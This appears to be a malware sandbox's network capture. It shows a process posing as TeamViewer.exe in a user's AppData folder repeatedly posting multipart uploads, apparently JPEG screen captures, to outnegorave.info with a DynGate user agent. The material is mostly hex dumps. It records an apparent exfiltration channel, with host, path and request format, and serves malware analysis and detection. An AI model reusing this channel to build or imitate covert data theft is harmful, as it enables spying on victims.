                                                                                                                                    2021-09-15 11:52:43 UTC2936OUTData Raw: a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26 3b 08 68 a0 d3 6a 4a 41 9a 29 29 29 5c 76 28 63 bd 2d 25 15 ca 75 8b 45 14 62 80 0a 28
                                                                                                                                    Data Ascii: !JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&;hjJA)))\v(c-%uEb(
                                                                                                                                    2021-09-15 11:52:43 UTC2952OUTData Raw: a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7 4f 16 9a 27 82 67 8a 55 2a e8 4a b0 3d 8d 32 b6 bc 63 e5 ff 00 c2 51 7b e5 63 1b 97 38 f5 da
                                                                                                                                    Data Ascii: IG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O'gU*J=2cQ{c8
                                                                                                                                    2021-09-15 11:52:43 UTC2954OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 36 38 38 39 36 33 38 37 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------168896387--
                                                                                                                                    2021-09-15 11:52:44 UTC2954INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:44 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=0520f37511019a32c874499f14c1766570e6bccde0d39622db35c24fb772fa29; expires=Thu, 15-Sep-2022 11:52:43 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FFOuu2IdBEN2FmEJqtf9%2FioN%2FhZDfpdli46C1KpB0aVQbIUGZGz6UD5eifurE%2BKsOVylufOjCOpRvx9J5oAJ55gwYEpY6zhpJHiAwwbPiONYbW11bOg0VsUAdlwSvo%2BcZ5af"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a68a68604a9e-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:44 UTC2955INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    35192.168.2.549826172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:45 UTC2955OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84996
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2074872272
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:45 UTC2956OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 37 34 38 37 32 32 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2074872272Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:45 UTC2956OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 81 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:45 UTC2956OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:45 UTC2972OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:45 UTC2988OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:45 UTC3004OUTData Raw: 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14 51 45 68 64 14 b4 94 b4 08 5a 29 29 69 09 8b 45 14 50 01 4a 28 a2 90 85 a2 8a 29 08 5a 51 49 40 a0 43 a9 57 ad 36 96 93 04 5b 88 d6 be 98 df be 5a c5 89 b8 ad 7d 30 fe f9 7e b5 c7 5d 7b ac f5 30 6f de 44 be 2e 3f e8 48 3d eb 8c b5 ff 00 90 84 3f f5 d1 7f 9d 76 3e 2f ff 00 8f 58 fe b5 c6 da 7f c8 42 0f fa e8 bf ce 9e 13 fd dc db 13 fe f0 76 7a ef fc 7d 2f fb b5 97 8a d4 d7 7f e3 ed 7f dd ac ba 8a 1f 02 23 13 fc 46
                                                                                                                                    Data Ascii: S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/QEhdZ))iEPJ()ZQI@CW6[Z}0~]{0oD.?H=?v>/XBvz}/#F
                                                                                                                                    2021-09-15 11:52:45 UTC3020OUTData Raw: 0b 45 25 2d 00 2d 14 94 b4 c4 2d 14 94 b4 08 5a 51 49 4b 4c 41 45 25 2d 30 16 96 9b 4b 40 87 0a 29 29 6a 84 28 a5 a6 e6 96 98 87 66 96 9b 4b 40 87 0a 51 4d a5 06 a9 32 59 20 a2 90 1a 2a 91 22 d2 d2 51 9a 61 61 73 46 69 05 2d 17 15 85 14 b9 a6 52 e6 9d c2 c3 f3 4b 4c cd 2e 69 93 61 c2 97 34 dc d1 4e e1 61 f9 a3 34 dc d1 bb da 8b 8a c4 80 d2 e6 a3 dc 7d 68 cf bd 3b 8a c4 99 14 66 a3 cd 2e 68 b8 ac 3f 34 66 9b 9a 33 4e e1 61 d4 b9 a6 d1 9a 2e 2b 0e cd 2e 69 99 a3 34 ee 16 1f 9a 33 4c dd 49 ba 8b 87 29 26 68 cd 47 ba 8d d4 ae 1c a4 9b a9 37 54 45 e9 a5 e8 72 1a 81 31 6a 69 7a 88 bd 34 b5 4b 99 4a 04 a5 e9 85 ea 32 d4 c2 d5 0e 45 a8 12 17 f7 a6 16 a6 16 a6 16 a8 72 34 51 1e 5a 98 5a 9a 5a 98 5a b3 72 34 51 1c 4d 30 9a 42 69 2a 1b 2d 21 49 a4 a4 a3 34 98 ec 21
                                                                                                                                    Data Ascii: E%---ZQIKLAE%-0K@))j(fK@QM2Y *"QaasFi-RKL.ia4Na4}h;f.h?4f3Na.+.i43LI)&hG7TEr1jiz4KJ2Er4QZZZZr4QM0Bi*-!I4!
                                                                                                                                    2021-09-15 11:52:45 UTC3036OUTData Raw: f4 6f e9 d2 86 31 34 9f 86 5a 5c 16 ed fd a9 34 97 73 ba e3 28 c5 15 3e 98 e4 9f af e5 5c f6 bf f0 d7 50 b3 dd 36 91 27 db 61 1c f9 6d 85 94 7f 46 fd 3e 94 cf 10 7c 38 d4 6c 37 4d a5 31 be 80 73 b0 0c 4a a3 e9 fc 5f 87 3e d5 d0 78 47 c0 da 19 b5 8e fa e6 5f ed 19 0f 54 65 da 91 b7 75 29 d7 23 b8 6f ca 90 1e 57 34 52 41 2b 45 3c 6f 1c 88 70 c8 ea 41 07 dc 1a 65 74 7f 10 91 23 f1 ad fa 46 aa 88 a2 20 15 46 00 1e 52 57 39 54 20 ab 7a 6d 93 5f 5d 08 c1 da 83 97 6f 41 55 2b a0 f0 be dc 5c 83 d7 e5 fc b9 a9 93 b2 d0 8a 95 15 35 ce d5 ec 6e 59 e8 d6 e1 36 5b 59 89 36 8e 49 4d c7 f1 aa fa 87 87 05 c2 b0 8e d5 a1 98 74 2a 84 7e 62 b7 46 ff 00 ec db 71 16 4c 63 3b f1 fd fc f7 fc 31 5b 7a 6f 9b f6 14 f3 f3 bb 27 6e ee bb 7b 7f 5a c3 13 4a 54 30 eb 10 a5 af 63 d1 86
                                                                                                                                    Data Ascii: o14Z\4s(>\P6'amF>|8l7M1sJ_>xG_Teu)#oW4RA+E<opAet#F FRW9T zm_]oAU+\5nY6[Y6IMt*~bFqLc;1[zo'n{ZJT0c
                                                                                                                                    2021-09-15 11:52:45 UTC3039OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 37 34 38 37 32 32 37 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2074872272--
                                                                                                                                    2021-09-15 11:52:45 UTC3039INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:45 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ff6d2ecb6c3d11db033c5039b9ad779e00511bb16ffe630d7ee68d53c654af9b; expires=Thu, 15-Sep-2022 11:52:45 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Kib5rl%2F43kEyRMr23qs3QVtkqxZ5UdBsVwE4Ar2%2FPzGsmaUtHalBD7Ds3BwGp%2FuwlcNg%2Ba5F4HuahxIuGP3DMEYbYQ0xQs16U0obIquuUH2Uvpc3sY9m0zfMnVuYUxsp1LgB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6938bed97d8-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:45 UTC3040INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    36192.168.2.549828172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:46 UTC3040OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85003
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1323967378
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:46 UTC3040OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 32 33 39 36 37 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1323967378Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:46 UTC3040OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 60 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^`;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:46 UTC3040OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:46 UTC3056OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:46 UTC3072OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:46 UTC3088OUTData Raw: 4b 49 45 31 01 a5 14 94 a2 80 14 52 52 8a 43 4c 41 4b 49 40 a4 03 85 38 53 69 6a 90 98 b4 52 52 d3 01 68 a2 8a 09 16 8a 28 a6 01 45 14 50 21 c2 96 9a 29 45 34 02 d2 d2 52 d3 24 29 69 29 45 30 16 8a 28 a6 21 68 a4 a5 a0 41 4b 49 4b 4d 00 ea 29 05 2d 32 42 94 51 45 30 16 8a 05 2d 31 09 49 4b 45 00 20 eb 4f a6 0e b4 fa 10 30 a0 d1 45 32 40 52 d2 0a 76 28 40 c5 02 9d 4d a7 0a a4 4b 13 bd 2d 21 eb 4e 14 c0 41 4e a6 d2 8a 62 62 d1 45 14 08 05 2d 20 a7 53 10 94 ea 4a 29 83 1d 4b 4d 14 b4 c9 1d 9a 51 4d a5 14 d0 98 e1 4b 4d a7 0a 64 b0 a5 a4 a2 98 85 a2 92 96 80 0a 5a 4a 5a 00 5a 5a 6d 3a 81 30 a5 14 94 b4 08 5a 29 29 68 10 52 d1 45 30 0a 51 45 28 a0 4c 5a 05 25 28 a0 46 86 92 3f 7e e7 d1 0d 56 3d 4f d6 ad 69 3f eb a4 ff 00 74 d5 53 d4 fd 6b 25 f1 b0 9f c2 82 8a
                                                                                                                                    Data Ascii: KIE1RRCLAKI@8SijRRh(EP!)E4R$)i)E0(!hAKIKM)-2BQE0-1IKE O0E2@Rv(@MK-!NANbbE- SJ)KMQMKMdZJZZZm:0Z))hRE0QE(LZ%(F?~V=Oi?tSk%
                                                                                                                                    2021-09-15 11:52:46 UTC3104OUTData Raw: 28 a4 a5 a6 02 d2 d3 69 68 10 e1 45 25 2d 50 85 14 b4 dc d2 d3 10 ec d2 d3 69 68 10 e1 4a 29 b4 a0 d5 26 4b 24 14 52 03 45 52 24 5a 5a 4a 33 4c 2c 2e 68 cd 20 a5 a2 e2 b0 a2 97 34 ca 5c d3 b8 58 7e 69 69 99 a5 cd 32 6c 38 52 e6 9b 9a 29 dc 2c 3f 34 66 9b 9a 37 7b 51 71 58 90 1a 5c d4 7b 8f ad 19 f7 a7 71 58 93 22 8c d4 79 a5 cd 17 15 87 e6 8c d3 73 46 69 dc 2c 3a 97 34 da 33 45 c5 61 d9 a5 cd 33 34 66 9d c2 c3 f3 46 69 9b a9 37 51 70 e5 24 cd 19 a8 f7 51 ba 95 c3 94 93 75 26 ea 88 bd 34 bd 0e 43 50 26 2d 4d 2f 51 17 a6 96 a9 73 29 40 94 bd 30 bd 46 5a 98 5a a1 c8 b5 02 42 fe f4 c2 d4 c2 d4 c2 d5 0e 46 8a 23 cb 53 0b 53 4b 53 0b 56 6e 46 8a 23 89 a6 13 48 4d 25 43 65 a4 29 34 94 94 66 93 1d 84 34 50 69 b5 25 20 cd 14 94 94 ae 3b 14 31 de 96 92 8a e5 3a c5
                                                                                                                                    Data Ascii: (ihE%-PihJ)&K$RER$ZZJ3L,.h 4\X~ii2l8R),?4f7{QqX\{qX"ysFi,:43Ea34fFi7Qp$Qu&4CP&-M/Qs)@0FZZBF#SSKSVnF#HM%Ce)4f4Pi% ;1:
